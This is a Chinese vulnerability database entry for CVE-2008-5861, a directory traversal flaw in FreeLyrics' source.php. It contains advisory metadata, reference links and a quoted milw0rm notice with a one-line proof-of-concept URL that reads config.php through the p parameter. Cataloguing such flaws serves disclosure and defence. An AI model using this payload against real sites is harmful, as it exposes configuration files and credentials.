freelyrics 'source.php'目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117089 漏洞类型 路径遍历
发布时间 2008-12-19 更新时间 2009-01-29
CVE编号 CVE-2008-5861 CNNVD-ID CNNVD-200901-050
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/7527
https://cxsecurity.com/issue/WLB-2009010131
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-050
|漏洞详情
FreeLyrics的脚本source.php存在目录遍历漏洞。远程攻击者可以借助p参数中的目录遍历序列,读取任意文件。
|漏洞EXP
################## Piker #######################################
#
#
#    FreeLyrics Remote Source Code Disclosure Vulnerability
#

#
#    Affected software: FreeLyrics
#    Vendor: http://lyrics.sourceforge.net/
#    Risk: Medium
#
################################################################

#
#    http://[target]/[path]/source.php?p=[FILE]
#
#   PoC: http://[target]/[path]/source.php?p=config.php
#
#   
################################################################
#
#         Found by Piker [piker0x90(at)gmail(dot)com]

#            D.O.M Labs - Security Researchers
#           www.domlabs.org
#
#
################################################################

# milw0rm.com [2008-12-19]
|参考资料

来源:BID
名称:32946
链接:http://www.securityfocus.com/bid/32946
来源:MILW0RM
名称:7527
链接:http://www.milw0rm.com/exploits/7527
来源:SREASON
名称:4875
链接:http://securityreason.com/securityalert/4875
来源:SECUNIA
名称:33252
链接:http://secunia.com/advisories/33252